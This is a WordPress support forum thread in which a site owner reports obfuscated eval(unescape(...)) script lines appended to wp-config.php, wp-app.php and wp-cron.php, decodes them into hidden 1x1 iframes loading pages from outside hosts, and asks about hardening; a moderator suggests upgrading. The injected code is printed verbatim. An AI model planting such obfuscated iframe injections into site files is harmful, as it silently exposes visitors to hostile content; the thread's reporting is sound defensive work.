Potential hack attempt

  • wildeep

    (@wildeep)


    18 years, 5 months ago

    After noting a ‘headers already sent’ error, I found these three lines at the bottom of a wordpress ‘wp-config.php’ file today:

    <body>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

    which after a bit of processing, turn out to be these lines of javascript:

    document.write(‘<iframe src=http://softspydelete.com/dl/newnew.php?adv=89 width=1 height=1></iframe>’);

    and

    document.write(‘<iframe src=http://softspydelete.com/dl/089/new.php width=1 height=1></iframe>’);

    respectively.

    I’ve pulled these lines (which removed the ‘headers already sent’ error)

Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter wildeep

    (@wildeep)

    18 years, 5 months ago

    Other than updating to the most recent version of WP, what else should I be doing to reduce the number/severity of attacks?

    Thread Starter wildeep

    (@wildeep)

    18 years, 5 months ago

    found some more:

    at the bottom of wp-app.php

    nobody:nobody set to 644

    <body>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>

    at the bottom of wp-cron.php

    nobody:nobody set to 644

    <body>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%67%68%74%73%74%61%74%73%2e%6e%65%74%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%67%68%74%73%74%61%74%73%2e%6e%65%74%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>

    Moderator Samuel Wood (Otto)

    (@otto42)

    ww.wp.xz.cn Admin

    18 years, 5 months ago

    What version of WordPress are you using? Older versions may be vulnerable to hacking. Upgrade to the latest version.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Potential hack attempt’ is closed to new replies.